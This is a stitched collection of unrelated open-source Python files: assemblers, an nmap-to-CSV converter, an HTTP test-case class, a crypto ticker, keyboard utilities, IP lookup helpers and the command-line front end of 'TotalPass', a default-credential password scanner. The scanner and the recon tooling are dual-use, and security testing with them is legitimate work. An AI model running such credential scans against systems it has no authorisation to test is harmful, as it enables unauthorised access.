if len(self.dataBuffer) == 0:
raise AssemblerException('Empty write buffer!, nothing to write')
self.parameters.outputFile.write(bytes(self.dataBuffer))
self.parameters.outputFile.close()
def assemble(self):
index = self.index
token = self.tokens[index]
if token.type != TYPES.INSTRUCTION and token.type != TYPES.LABEL:
raise AssemblerException('Unexpected token of type ' + str(token.type) +
', value: ' +
str(token.value) + ' in line: ' +
str(token.lineNumber))
self.index += 1
usedArguments = 0
if token.type == TYPES.LABEL:
self.labels[token.value] = self.currentAddress
print(token.value, self.currentAddress)
return
if token.value == 'DB':
usedArguments += self.insertValue(1, usedArguments)
elif token.value == 'DW':
usedArguments += self.insertValue(2, usedArguments)
elif token.value == 'DD':
usedArguments += self.insertValue(4, usedArguments)
elif token.value == 'DQ':
usedArguments += self.insertValue(8, usedArguments)
else:
raise AssemblerException('unnown exception ' + str(token.value) +
' in line: ' + str(token.lineNumber))
self.index += usedArguments
def insertValue(self, length, offset, recursive=False):
index = self.index + offset
argument = self.tokens[index]
if argument.type == TYPES.STRING:
counter = 0
for character in argument.value[1:-1]:
counter += 1
self.dataBuffer += bytearray(
ord(character).to_bytes(1, byteorder=self.parameters.endianess))
if counter % length != 0:
self.dataBuffer += bytearray(int(0).to_bytes(length - counter %
length, byteorder=self.parameters.endianess))
self.currentAddress += counter + (length - counter) % length
elif argument.type == TYPES.INT:
self.dataBuffer += bytearray(argument.value.to_bytes(
length, byteorder=self.parameters.endianess))
self.currentAddress += length
else:
raise AssemblerException('Wrong argument type: ' + str(argument.type) +
', value: ' +
str(argument.value) + ' in line: ' +
str(argument.lineNumber))
try:
nextToken = self.tokens[self.index+offset + 1]
# if next argument is comma then there is another argument waiting to be printed
if nextToken.type == TYPES.COMMA:
return self.insertValue(length, offset + 2, True)
except IndexError:
pass
# necessary for correct index calculation
if recursive:
return offset + 1
return 1
``` |
{
"source": "0xgregor/axiom",
"score": 2
} |
#### File: axiom/interact/nmaptocsv.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# Global imports
import sys
import re
import csv
import struct
import socket
import itertools
import argparse
import xml.etree.cElementTree as ET
# Python 2 and 3 compatibility
if (sys.version_info < (3, 0)):
izip = itertools.izip
fd_read_options = 'rb'
fd_write_options = 'wb'
else:
izip = zip
fd_read_options = 'r'
fd_write_options = 'w'
# Script version
VERSION = '1.6'
# Options definition
parser = argparse.ArgumentParser()
# Options definition
mandatory_grp = parser.add_argument_group('Mandatory parameters')
mandatory_grp.add_argument('-i', '--input', help = 'Nmap scan output file in normal (-oN) or Grepable (-oG) format (stdin if not specified)')
mandatory_grp.add_argument('-x', '--xml-input', help = 'Nmap scan output file in XML (-oX) format')
output_grp = parser.add_argument_group('Output parameters')
output_grp.add_argument('-o', '--output', help = 'CSV output filename (stdout if not specified)')
output_grp.add_argument('-f', '--format', help = 'CSV column format { fqdn, rdns, hop_number, ip, mac_address, mac_vendor, port, protocol, os, script, service, version } (default: ip-fqdn-port-protocol-service-version)', default = 'ip-fqdn-port-protocol-service-version')
output_grp.add_argument('-S', '--script', help = 'Adds the script column in output, alias for -f "ip-fqdn-port-protocol-service-version-script"', action = 'store_const', const = 'ip-fqdn-port-protocol-service-version-script')
output_grp.add_argument('-d', '--delimiter', help = 'CSV output delimiter (default ";"). Ex: -d ","', default = ';')
output_grp.add_argument('-n', '--no-newline', help = 'Do not insert a newline between each host. By default, a newline is added for better readability', action = 'store_true', default = False)
output_grp.add_argument('-s', '--skip-header', help = 'Do not print the CSV header', action = 'store_true', default = False)
# Handful patterns
#-- IP regex
p_ip_elementary = r'(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3})'
p_mac_elementary = r'[0-9a-fA-F][0-9a-fA-F]:){5}([0-9a-fA-F][0-9a-fA-F]'
# Nmap Normal Output patterns
#-- Target
p_ip_nmap5 = r'Interesting.*on\s(?:(?P<fqdn_nmap5>.*) (?=\((?P<ip_nmap5>%s)\)))|Interesting.*on\s(?P<ip_only_nmap5>.*)\:' % p_ip_elementary
p_ip_nmap6 = r'Nmap.*for\s(?:(?P<fqdn_nmap6>.*) (?=\((?P<ip_nmap6>%s)\)))|Nmap.*for\s(?P<ip_only_nmap6>%s)$' % (p_ip_elementary, p_ip_elementary)
p_ip = re.compile('%s|%s' % (p_ip_nmap5, p_ip_nmap6))
#-- rDNS
p_rdns = re.compile(r'rDNS record for (?P<ip>%s):\s(?P<rdns>.*)$' % p_ip_elementary)
#-- Port header
p_port_header = re.compile(r'^(?P<port>PORT)\s+(?P<state>STATE)\s+(?P<service>SERVICE)\s+(?P<reason>REASON\s*)?(?P<version>VERSION$)?')
#-- Port finding
p_port_without_reason = re.compile(r'^(?P<number>[\d]+)\/(?P<protocol>tcp|udp)\s+(?:open|open\|filtered)\s+(?P<service>[\w\S]*)(?:\s*(?P<version>.*))?$')
p_port_with_reason = re.compile(r'^(?P<number>[\d]+)\/(?P<protocol>tcp|udp)\s+(?:open|open\|filtered)\s+(?P<service>[\w\S]*)\s+(?P<reason>.* ttl [\d]+)\s*(?:\s*(?P<version>.*))$')
#-- Script output finding
p_script = re.compile(r'^\|[\s|\_](?P<script>.*)$')
#-- MAC address
p_mac = re.compile(r'MAC Address:\s(?P<mac_addr>(%s))\s\((?P<mac_vendor>.*)\)' % p_mac_elementary)
#-- OS detection (pattern order is important, the latter position the more precise and reliable the information is)
p_os = re.compile(r'(?:^Service Info: OS|^OS CPE|\s+OS|^OS details|smb-os-discovery|\|):\s(?P<os>[^;]+)')
#-- Network distance
p_network_dist = re.compile(r'Network Distance:\s(?P<hop_number>\d+)\shops?')
# Nmap Grepable output
#-- Target, Ports
p_grepable = re.compile(r'(?P<whole_line>^Host:\s.*)')
# Handful functions
def dottedquad_to_num(ip):
"""
Convert decimal dotted quad string IP to long integer
"""
return struct.unpack('!L',socket.inet_aton(ip))[0]
def num_to_dottedquad(n):
"""
Convert long int IP to dotted quad string
"""
return socket.inet_ntoa(struct.pack('!L',n))
def unique_match_from_list(list):
"""
Check the list for a potential pattern match
@param list : a list of potential matching groups
@rtype : return the string representation of the unique value that matched, or nothing if nothing matched
"""
result = ''
for item in list:
if item != None:
result = str(item)
return result
def extract_matching_pattern(regex, group_name, unfiltered_list):
"""
Return the desired group_name from a list of matching patterns
@param regex : a regular expression with named groups
@param group_name : the desired matching group name value
@param unfiltered_list : a list of matches
@rtype : the string value
"""
result = ''
filtered_list = list(filter(regex.search, unfiltered_list))
if len(filtered_list) == 1:
filtered_string = ''.join(filtered_list)
result = regex.search(filtered_string).group(group_name)
return result
class Host:
def __init__(self, ip, fqdn=''):
self.ip_dottedquad = ip
self.ip_num = dottedquad_to_num(ip)
self.fqdn = fqdn
self.rdns = ''
self.ports = []
self.os = ''
self.mac_address = ''
self.mac_address_vendor = ''
self.network_distance = ''
def add_port(self, port):
self.ports.append(port)
# Getters
def get_ip_num_format(self):
return str(self.ip_num)
def get_ip_dotted_format(self):
return str(self.ip_dottedquad)
def get_fqdn(self):
return str(self.fqdn)
def get_rdns_record(self):
return str(self.rdns)
def get_port_list(self):
return self.ports
def get_port_number_list(self):
if not(self.get_port_list()):
return ['']
else:
result = []
for port in self.get_port_list():
result.append(port.get_number())
return result
def get_port_protocol_list(self):
if not(self.get_port_list()):
return ['']
else:
result = []
for port in self.get_port_list():
result.append(port.get_protocol())
return result
def get_port_service_list(self):
if not(self.get_port_list()):
return ['']
else:
result = []
for port in self.get_port_list():
result.append(port.get_service())
return result
def get_port_version_list(self):
if not(self.get_port_list()):
return ['']
else:
result = []
for port in self.get_port_list():
result.append(port.get_version())
return result
def get_port_script_list(self):
if not(self.get_port_list()):
return ['']
else:
result = []
for port in self.get_port_list():
result.append(port.get_script())
return result
def get_os(self):
return str(self.os)
def get_mac_address(self):
return str(self.mac_address)
def get_mac_address_vendor(self):
return str(self.mac_address_vendor)
def get_network_distance(self):
return str(self.network_distance)
# Setters
def set_fqdn(self, fqdn):
self.fqdn = fqdn
def set_rdns_record(self, rdns_record):
self.rdns = rdns_record
def set_os(self, os):
self.os = os
def set_mac(self, mac_address, mac_address_vendor = ''):
self.mac_address = mac_address
self.mac_address_vendor = mac_address_vendor
def set_network_distance(self, network_distance):
self.network_distance = network_distance
class Port:
def __init__(self, number, protocol, service='', version='', script=''):
self.number = number
self.protocol = protocol
self.service = service
self.version = version
self.script = script
def get_number(self):
return self.number
def get_protocol(self):
return self.protocol
def get_service(self):
return self.service
def get_version(self):
return self.version
def get_script(self):
return self.script.strip()
def set_service(self, service):
self.service = service
def set_version(self, version):
self.version = version
def set_script(self, script):
self.script = script
def split_grepable_match(raw_string):
"""
Split the raw line to a neat Host object
@param raw_string : the whole 'Host' line
@rtype : return an Host object
"""
global p_ip_elementary
splitted_fields = raw_string.split("\t")
# Patterns
p_host = re.compile(r'Host:\s(?P<ip>%s)\s+\((?P<fqdn>|.*)\)' % p_ip_elementary)
p_ports = re.compile(r'Ports:\s+(?P<ports>.*)/')
p_os = re.compile(r'OS:\s(?P<os>.*)')
# Extracted named-group matches
IP_str = extract_matching_pattern(p_host, 'ip', splitted_fields)
FQDN_str = extract_matching_pattern(p_host, 'fqdn', splitted_fields)
ports_str = extract_matching_pattern(p_ports, 'ports', splitted_fields)
OS_str = extract_matching_pattern(p_os, 'os', splitted_fields)
current_host = Host(IP_str, FQDN_str)
current_host.set_os(OS_str)
# Let's split the raw port list
all_ports = ports_str.split(', ')
# Keep only open ports
open_ports_list = filter(lambda p: '/open/' in p, all_ports)
for open_port in open_ports_list:
# Extract each field from the format [port number / state / protocol / owner / service / rpc info / version info]
# -- Thanks to http://www.unspecific.com/nmap-oG-output/
number, state, protocol, owner, service, version = open_port.split('/', 5)
# remove potential leading and trailing slashes on version
version = version.strip('/')
new_port = Port(number, protocol, service, version)
current_host.add_port(new_port)
return current_host
def parse(fd):
"""
Parse the data according to several regexes
@param fd : input file descriptor, could be a true file or stdin
@rtype : return a list of <Host> objects indexed from their numerical IP representation
"""
global p_ip_elementary, p_ip, p_port_without_reason, p_port_with_reason, p_grepable, p_script, p_mac, p_os, p_network_dist, p_rdns
IPs = {}
last_host = None
p_port = p_port_without_reason
in_script_line = False
script = ''
lines = [l.rstrip() for l in fd.readlines()]
for line in lines:
# 1st case: Nmap Normal Output
#-- 1st action: Grab the IP
IP = p_ip.search(line)
if IP:
# Check out what patterns matched
IP_potential_match = [IP.group('ip_nmap5'), IP.group('ip_only_nmap5'), IP.group('ip_nmap6'), IP.group('ip_only_nmap6')]
IP_str = unique_match_from_list(IP_potential_match)
FQDN_potential_match = [IP.group('fqdn_nmap5'), IP.group('fqdn_nmap6')]
FQDN_str = unique_match_from_list(FQDN_potential_match)
new_host = Host(IP_str, FQDN_str)
IPs[new_host.get_ip_num_format()] = new_host
last_host = new_host
# 1st case: Nmap Normal Output
#-- 2nd action: Check if there is a rDNS record
rDNS = p_rdns.search(line)
if rDNS:
if rDNS.group('ip') and rDNS.group('rdns'):
rdns_ip_num_format = str(dottedquad_to_num(rDNS.group('ip')))
if rdns_ip_num_format in IPs.keys():
IPs[rdns_ip_num_format].set_rdns_record(rDNS.group('rdns'))
# 1st case: Nmap Normal Output
#-- 3rd action: Check the port header, to know if there is a reason column
port_header = p_port_header.search(line)
if port_header:
if port_header.group('reason'):
p_port = p_port_with_reason
else:
p_port = p_port_without_reason
# 1st case: Nmap Normal Output
#-- 4th action: Grab the script output
script_line = p_script.search(line)
if script_line:
in_script_line = True
script = script + script_line.group('script') + '\n'
else:
# We were in a script output section, now it's finished
if in_script_line:
last_port = last_host.get_port_list()[-1]
last_port = last_port.set_script(script)
# reseting trackers
in_script_line = False
script = ''
# 1st case: Nmap Normal Output
#-- 5th action: Grab the port
port = p_port.search(line)
if port and last_host != None:
number = str(port.group('number'))
protocol = str(port.group('protocol'))
service = str(port.group('service'))
version = str(port.group('version'))
new_port = Port(number, protocol, service, version)
last_host.add_port(new_port)
# 1st case: Nmap Normal Output
#-- 6th action: Grab the MAC address
mac = p_mac.search(line)
if mac:
last_host.set_mac(str(mac.group('mac_addr')), str(mac.group('mac_vendor')))
# 1st case: Nmap Normal Output
#-- 7th action: Grab the OS detection
os = p_os.search(line)
if os:
last_host.set_os(str(os.group('os')))
# 1st case: Nmap Normal Output
#-- 8th action: Grab the network distance
network_distance = p_network_dist.search(line)
if network_distance:
last_host.set_network_distance(str(network_distance.group('hop_number')))
# 2nd case: Nmap Grepable Output
#-- 1 sole action: Grab the whole line for further splitting
grepable = p_grepable.search(line)
if grepable:
if grepable.group('whole_line'):
new_host = split_grepable_match(grepable.group('whole_line'))
# Update the occurence found with 'Status: Up'
IPs[new_host.get_ip_num_format()] = new_host
last_host = new_host
return IPs
def parse_xml(xml_file):
"""
Parse the XML file
@param xml_file : the input file
@rtype : return a list of <Host> objects indexed from their numerical IP representation
"""
IPs = {}
try:
tree = ET.ElementTree(file=xml_file)
root = tree.getroot()
except ET.ParseError as e:
print("[!] An error has occurred while parsing the XML file: '%s'.\nExiting" % e)
return None
for host in root.findall('host'):
if 'up' in host.find('status').get('state'):
# IP, MAC
addresses = host.findall('address')
for address in addresses:
if 'ipv4' in address.get('addrtype') and address.get('addr'):
ip_dottedquad = address.get('addr')
new_host = Host(ip_dottedquad)
if 'mac' in address.get('addrtype'):
mac_addr = address.get('addr')
mac_vendor = address.get('vendor')
new_host.set_mac(mac_addr, mac_vendor)
# FQDN, RDNS
hostnames = host.findall('./hostnames/hostname')
for hostname in hostnames:
if hostname.get('name') and 'user' in hostname.get('type'):
new_host.set_fqdn(hostname.get('name'))
if hostname.get('name') and 'PTR' in hostname.get('type'):
new_host.set_rdns_record(hostname.get('name'))
# Ports (protocol, number, service, version) and script output
open_ports = host.findall("./ports/port/state[@state='open']/..")
for port in open_ports:
protocol = port.get('protocol')
number = port.get('portid')
new_port = Port(number, protocol)
service = port.find('service')
if service != None:
service_name = service.get('name') if service.get('name') else ''
service_product = service.get('product') if service.get('product') else ''
service_version = service.get('version') if service.get('version') else ''
service_extrainfo = service.get('extrainfo') if service.get('extrainfo') else ''
version = ("%s %s %s" % (service_product, service_version, service_extrainfo)).strip()
new_port.set_service(service_name)
new_port.set_version(version)
scripts = port.findall('script')
script_output = ''
for script in scripts:
script_output = script_output + "\n%s: %s" % (script.get('id'), script.get('output'))
new_port.set_script(script_output)
new_host.add_port(new_port)
# OS
osmatches = host.findall('./os/osmatch')
os = "|".join(osmatch.get('name') for osmatch in osmatches)
new_host.set_os(os)
# Hop
hop_number = len(host.findall('./trace/hop'))
new_host.set_network_distance(hop_number)
IPs[new_host.get_ip_num_format()] = new_host
return IPs
def is_format_valid(fmt):
"""
Check for the supplied custom output format
@param fmt : the supplied format
@rtype : True or False
"""
supported_format_objects = [ 'fqdn', 'rdns', 'hop_number', 'ip', 'mac_address', 'mac_vendor', 'port', 'protocol', 'os', 'script', 'service', 'version' ]
unknown_items = []
for fmt_object in fmt.split('-'):
if not(fmt_object in supported_format_objects):
unknown_items.append(fmt_object)
if unknown_items:
return False, unknown_items
else:
return True, None
def formatted_item(host, format_item):
"""
return the attribute value related to the host
@param host : host object
@param format_item : the attribute supplied in the custom format
@rtype : the <list> attribute value
"""
if isinstance(host, Host):
option_map = {
'fqdn': [host.get_fqdn()],
'rdns': [host.get_rdns_record()],
'hop_number': [host.get_network_distance()],
'ip': [host.get_ip_dotted_format()],
'mac_address': [host.get_mac_address()],
'mac_vendor': [host.get_mac_address_vendor()],
'os': [host.get_os()],
'port': host.get_port_number_list(),
'protocol': host.get_port_protocol_list(),
'service': host.get_port_service_list(),
'version': host.get_port_version_list(),
'script': host.get_port_script_list()
}
if format_item in option_map.keys():
return option_map[format_item]
else:
return ''
else:
return []
def repeat_attributes(attribute_list):
"""
repeat attribute lists to the maximum for the
@param attribute_list : raw list with different attribute list length
@rtype : a list consisting of length equal attribute list
"""
max_number = len(max(attribute_list, key=len))
attribute_list = map(lambda x: x * max_number, attribute_list)
return attribute_list
def generate_csv(fd, results, options):
"""
Generate a plain ';' separated csv file with the desired or default attribute format
@param fd : output file descriptor, could be a true file or stdout
"""
if results:
spamwriter = csv.writer(fd, delimiter=options.delimiter, quoting=csv.QUOTE_ALL, lineterminator='\n')
splitted_options_format = options.format.split('-')
if not options.skip_header:
csv_header = [format_item.upper() for format_item in splitted_options_format]
spamwriter.writerow(csv_header)
# for IP in sorted(results.iterkeys())
for IP in sorted(results):
formatted_attribute_list = []
for index,format_item in enumerate(splitted_options_format):
item = formatted_item(results[IP], format_item)
formatted_attribute_list.insert(index, item)
formatted_attribute_list = repeat_attributes(formatted_attribute_list)
for line_to_write in izip(*formatted_attribute_list):
spamwriter.writerow(list(line_to_write))
# Print a newline if asked
if not options.no_newline:
spamwriter.writerow('')
return
def main():
global parser
options = parser.parse_args()
# Supplied format
if options.script:
options.format = options.script
valid_format, unknown_items = is_format_valid(options.format)
if not valid_format:
parser.error("Please specify a valid output format: '%s' is invalid \n\
Supported objects are { fqdn, rdns, hop_number, ip, mac_address, mac_vendor, port, protocol, os, script, service, version }" % ', '.join(unknown_items))
# Input selection
if (options.input != None) and (options.xml_input != None):
parser.error("Please specify either a normal/grepable or an XML input file")
elif (options.input == None) and (options.xml_input != None):
results = parse_xml(options.xml_input)
elif options.xml_input == None:
if options.input != None:
fd_input = open(options.input, fd_read_options)
else:
# No input file specified, reading from stdin
fd_input = sys.stdin
# Analysis
results = parse(fd_input)
fd_input.close()
# Output descriptor
if options.output != None:
fd_output = open(options.output, fd_write_options)
else:
# No output file specified, writing to stdout
fd_output = sys.stdout
# CSV output
generate_csv(fd_output, results, options)
fd_output.close()
return
if __name__ == "__main__":
main()
``` |
{
"source": "0xh4di/httpninja",
"score": 2
} |
#### File: httpninja/Testing/testcase_definition.py
```python
from string import Template
import os
import re
class TestcaseObject(object):
_rawTemplate = ''
templateRequest = Template('')
selectRegExFromRequest = ''
flagRegExStrInResponse = ''
inverseFlag = False
description = ''
timeout = 0
isEnabled = True
isRateLimited = False
sendInitialChars = 0
sendBodyCharRate = 1
delayInBetween = 0
autoContentLength = False
# The class "constructor" - It's actually an initializer
def __init__(self, rawTemplate='',selectRegExFromRequest='',flagRegExStrInResponse='', inverseFlag=False,description='' ,isEnabled=True,timeout=0,
isRateLimited=False, sendInitialChars=0, sendBodyCharRate=1, delayInBetween=0, autoContentLength=False):
self._rawTemplate = rawTemplate
self.selectRegExFromRequest = selectRegExFromRequest
self.flagRegExStrInResponse = flagRegExStrInResponse
self.inverseFlag = inverseFlag
self.description = description
self.isEnabled = isEnabled
self.timeout = timeout
self.isRateLimited = isRateLimited
self.sendInitialChars = sendInitialChars
self.sendBodyCharRate = sendBodyCharRate
self.delayInBetween = delayInBetween
self.autoContentLength = autoContentLength
self._setParams()
def _setParams(self):
self.templateRequest = Template(self._rawTemplate)
def ReqBuilder(self, target_BoxObject):
filename, extension = os.path.splitext(target_BoxObject.path)
extension = extension[1:] # removing the dot character before the extension
result = self.templateRequest.safe_substitute(ip=target_BoxObject.ip,
port=target_BoxObject.port,
path=target_BoxObject.path,
filename=filename,
extension=extension,
hostname=target_BoxObject.hostname,
description=target_BoxObject.description)
if self.autoContentLength:
bodylength = len(result) - re.search("(\r\n\r\n)|(\n\n)", result).end()
if re.search("content\\-length", result, re.IGNORECASE):
result = re.sub(r"(?i)content\-length:\s*\d+", "Content-Length: " + str(bodylength),
result, 1)
else:
result = re.sub(r"(\r\n\r\n)|(\n\n)", "\r\nContent-Length: " + str(bodylength) + "\r\n\r\n",
result, 1)
return result
``` |
{
"source": "0xhackworth/zero-crypto-screen",
"score": 3
} |
#### File: 0xhackworth/zero-crypto-screen/main.py
```python
import json
import time
from urllib.error import HTTPError, URLError
from urllib.request import Request, urlopen
import itertools
from config.builder import Builder
from config.config import config
from logs import logger
from presentation.observer import Observable
SCREEN_REFRESH_INTERVAL = 9600
DATETIME_FORMAT = "%Y-%m-%dT%H:%M"
def get_dummy_data():
logger.info('Generating dummy data')
def fetch_prices(token):
logger.info('Fetching prices')
url = f'https://api.coingecko.com/api/v3/coins/{token}/ohlc?vs_currency={config.currency}&days={config.days}'
req = Request(url)
data = urlopen(req).read()
prices = json.loads(data)
#external_data = json.loads(data)
#prices = [entry[1:] for entry in external_data]
return prices
def main():
logger.info('Initialize')
data_sink = Observable()
builder = Builder(config)
builder.bind(data_sink)
coins = config.cryptocurrencies.split(',')
refresh_bucket = 0
try:
for coin in itertools.cycle(coins):
try:
if refresh_bucket > SCREEN_REFRESH_INTERVAL:
data_sink.screenrefresh_observers()
refresh_bucket = 0
prices = [entry[1:] for entry in get_dummy_data()] if config.dummy_data else fetch_prices(coin.split(':')[0])
data_sink.update_observers(coin.split(':')[1], prices)
refresh_bucket = refresh_bucket + config.refresh_interval
time.sleep(config.refresh_interval)
except (HTTPError, URLError) as e:
logger.error(str(e))
time.sleep(5)
except IOError as e:
logger.error(str(e))
except KeyboardInterrupt:
logger.info('Exit')
data_sink.screenrefresh_observers()
data_sink.close()
exit()
if __name__ == "__main__":
main()
``` |
{
"source": "0xhexdec/UltimateKeyboardCreator",
"score": 3
} |
#### File: 0xhexdec/UltimateKeyboardCreator/Utils.py
```python
from .KeyboardData import KeyboardObject
from .Types import KeyboardKey, SupportDirection
# keyboardObjecttype
# 0 = normal switch
# 1 = stabalizer foot
def updateLayoutData(keyboardObject: KeyboardObject):
keys = 0
for row in keyboardObject.layoutData:
key: KeyboardKey
for key in row:
keys += 1
if keyboardObject.doubleSwitchForSpace and key.width >= 4:
key.isMultiSwitch = True
key.switches.clear()
key.switches.append((key.x - (key.width / 4), key.y))
key.switches.append((key.x + (key.width / 4), key.y))
keys += 1
elif key.height >= keyboardObject.supportKeySize:
key.support = SupportDirection.VERTICAL
key.supports.clear()
key.supports.append((key.x, key.y - keyboardObject.supportSizes[key.height]))
key.supports.append((key.x, key.y + keyboardObject.supportSizes[key.height]))
elif key.width >= keyboardObject.supportKeySize:
key.support = SupportDirection.HORIZONTAL
key.supports.clear()
key.supports.append((key.x - keyboardObject.supportSizes[key.width], key.y))
key.supports.append((key.x + keyboardObject.supportSizes[key.width], key.y))
else:
key.isMultiSwitch = False
key.support = SupportDirection.NONE
None
``` |
{
"source": "0xhh/TinyE8",
"score": 3
} |
#### File: 0xhh/TinyE8/eas.py
```python
import sys
def assemble(inFilename, outFilename):
#instruction set
instructions = {
"NOP" : 0x0,
"LDA" : 0x1,
"ADD" : 0x2,
"SUB" : 0x3,
"STA" : 0x4,
"LDI" : 0x5,
"JMP" : 0x6,
"JC" : 0x7,
"JZ" : 0x8,
"OUT" : 0xE,
"HLT" : 0xF
}
#open the asm file
try:
f = open(inFilename, "r")
except:
print(f"Error: {inFilename} file not found.")
#copy the whole file into a buffer and close the file
buffer = f.read()
f.close()
#split the buffer based on new lines, we will have a list of instructions
tokens = buffer.split("\n")
#output buffer
output = []
#iterate through the tokens, convert them to hexadecimal
#values based on instruction set and append it to output
for i in range(16):
try:
ins = tokens[i].split(" ")
if(ins[0] in instructions):
if(len(ins)==1):
output.append(hex(instructions[ins[0]]<<4 | 0 ))
#print(hex(instructions[ins[0]]<<4 | 0 ))
else:
output.append(hex(instructions[ins[0]]<<4 | int(ins[1])))
#print(hex(instructions[ins[0]]<<4 | int(ins[1])))
else:
if(len(ins)==1):
output.append(hex(int(ins[0])))
#print(hex(int(ins[0])))
except Exception as e:
output.append(hex(0))
#write the output buffer to a bin file by converting it into to bytes
with open(outFilename, "wb") as f:
for i in output:
print(i)
f.write(bytes((int(i,16),)))
f.close()
if(len(sys.argv) != 4):
print("Usage: python3 eas.py <asm filename> -o <bin filename>")
exit()
inFilename = sys.argv[1]
outFilename = sys.argv[3]
assemble(inFilename, outFilename)
``` |
{
"source": "0xHJK/ipip",
"score": 3
} |
#### File: ipip/addons/ip138.py
```python
import requests
from pyquery import PyQuery as pq
from ..settings import opts
API = "https://2021.ip138.com/"
def myip() -> str:
""" 查本机IP """
try:
r = requests.get(API, headers=opts.fake_headers)
d = pq(r.text)
return d(d("p")[0]).text()
except Exception as e:
return "0.0.0.0"
def ipinfo(ip) -> str:
try:
pass
except Exception as e:
return "%s query failed." % ip
```
#### File: ipip/addons/qqwry.py
```python
import ipdb
from ..settings import opts
DB = ipdb.City(opts.ipdbfile)
def ipinfo(ip) -> str:
""" 查找单个IP """
ip = ip.strip()
try:
return "%s, %s" % (ip, ", ".join(DB.find(ip.strip(), "CN")))
except Exception as e:
return "%s query failed." % ip
def ipbatch(ipaddrs) -> list:
""" 查找多个IP """
return [ipinfo(ip) for ip in ipaddrs]
``` |
{
"source": "0xHJK/TotalPass",
"score": 2
} |
#### File: TotalPass/totalpass/__main__.py
```python
import os
import sys
import logging
import click
from prettytable import PrettyTable
from .core import TPCore
from .passwd import Passwd
from .target import Target
from .settings import opts
from .__version__ import __version__
def banner():
return (
"\nTotalPass %s created by HJK.\nhttps://github.com/0xHJK/TotalPass\n"
% __version__
)
@click.group()
@click.version_option(message=banner())
def main():
print(banner())
@main.command()
def list():
""" 列出所有支持的设备信息和服务类型 """
TPCore.anylist()
@main.command()
def update():
""" 从 cirt.net 更新密码库"""
TPCore.anyupdate()
@main.command()
@click.argument("keywords", nargs=-1, required=True)
@click.option("-v", "--verbose", count=True, help="详细输出模式")
def search(keywords, verbose):
""" 从密码库中搜索密码 """
TPCore.anysearch(keywords, verbose)
@main.command()
@click.argument("target", nargs=-1, required=True)
@click.option("-x", "--name", help="指定设备型号或品牌")
@click.option("-c", "--category", multiple=True, help="指定扫描类型")
@click.option("-p", "--port", type=int, help="指定扫描端口")
@click.option("-d", "--dirname", help="指定字典目录或文件")
@click.option("--common", is_flag=True, default=False, help="使用常见弱口令字典")
@click.option("-t", "--threads", default=10, type=int, help="指定线程数量")
@click.option("-v", "--verbose", count=True, help="详细输出模式")
def scan(target, name, common, category, port, dirname, threads, verbose):
""" 指定目标进行密码扫描 """
if verbose < 1:
level = logging.WARNING
elif verbose < 2:
level = logging.INFO
else:
level = logging.DEBUG
logging.basicConfig(
level=level,
format="[%(asctime)s] %(levelname)-8s | %(msg)s ",
datefmt="%H:%M:%S",
)
opts.threads = threads
if name:
opts.name = name
if common:
opts.common = "common"
if category:
opts.categories = category
else:
from . import addons
opts.categories = addons.__all__
opts.port = port
if dirname and os.path.exists(dirname):
opts.passwds_path = dirname
# passwds会影响categories,所以必须先load passwds
opts.passwds = Passwd.load()
opts.targets = Target.parse(target)
opts.running = True
try:
TPCore.anyscan()
except KeyboardInterrupt as e:
opts.running = False
click.echo("Exit.")
sys.exit()
finally:
click.echo("\n--- Result -------------")
if not opts.result:
click.secho("[x] Not Found", fg="red")
else:
for msg in opts.result:
click.secho(msg, fg="green")
click.echo("------------------------\n")
if __name__ == "__main__":
main()
```
#### File: TotalPass/totalpass/target.py
```python
import os
import re
import sys
import copy
import logging
import socket
import click
from netaddr import IPNetwork
from netaddr.core import AddrFormatError
from .settings import opts
from . import addons
class Target(object):
"""
测试目标对象,不同目标之间IP、端口、分类均不同
"""
logger = logging.getLogger("TotalPass")
def __init__(self, host=None, port=None, category=None, protocol=None, url=None):
self.logger = Target.logger
self.host = host
port = port or opts.port
port = int(re.sub(r"\D", "", str(port))) if port else None
self.port = port if port and 0 < port < 65535 else None
self.category = category or protocol
self.protocol = protocol
self.url = url
def __eq__(self, other):
return self.__dict__ == other.__dict__
def __repr__(self):
s1 = "%s://" % self.protocol if self.protocol else ""
s2 = self.host or ""
s3 = ":%s" % self.port if self.port else ""
s = s1 + s2 + s3 if s2 else ""
return s
def alive(self) -> bool:
"""
检查端口是否开放
"""
if not self.port:
click.secho("[x] %s No port specified." % self.host, fg="red")
return False
addr = (self.host, int(self.port))
try:
# 检测TCP
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(opts.timeout_alive)
s.connect(addr)
s.close()
click.secho("[+] [TCP] %s:%s is open." % (self.host, self.port), fg="green")
return True
except ConnectionRefusedError as e:
# 检测UDP
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.settimeout(opts.timeout_alive)
s.connect(addr)
s.close()
click.secho("[+] [UDP] %s:%s is open." % (self.host, self.port), fg="green")
return True
except Exception as e:
click.secho("[x] %s:%s is close." % (self.host, self.port), fg="red")
self.logger.debug("%s Exception: %s" % (type(e).__name__, str(e)))
return False
def load_scanners(self) -> list:
"""
加载对应的扫描器
"""
scanners = []
if self.category and self.category in addons.__all__:
addon = sys.modules.get("%s.addons.%s" % (__package__, self.category))
self.logger.info("Creating %s %s scanners..." % (self.category, self))
for passwd in opts.passwds:
if passwd.category != self.category and passwd.category != opts.common:
continue
for cred in passwd.credentials:
scanners.append(
addon.mkscanner(
passwd,
self,
cred.get("username", ""),
cred.get("password", ""),
)
)
else:
click.secho(
"[x] #%s %s is not yet supported." % (self.category, self), fg="red"
)
return scanners
@classmethod
def parse(cls, target) -> list:
"""
解析目标主机生成target list
target 可能是tuple/list/str或文件
"""
mid_targets = [] # 中间结果
ret_targets = [] # 最终结果(补全了端口)
if isinstance(target, str):
if os.path.isfile(target):
# TODO
pass
else:
mid_targets = cls._parse_str(target)
elif isinstance(target, tuple) or isinstance(target, list):
for t in target:
mid_targets += cls._parse_str(t)
# return mid_targets
# 为targets补全端口和分类
for t in mid_targets:
if t.category:
t.port = t.port or opts.port or opts.port_map.get(t.category, 0)
ret_targets.append(t)
else:
for cat in opts.categories:
nt = copy.deepcopy(t)
nt.category = cat
nt.port = nt.port or opts.port or opts.port_map.get(cat, 0)
ret_targets.append(nt)
return ret_targets
@classmethod
def _parse_str(cls, target) -> list:
"""
解析字符串形式的目标
"""
cls.logger.info("Parsing target %s" % target)
if not isinstance(target, str):
cls.logger.error("Target %s is not str" % target)
return []
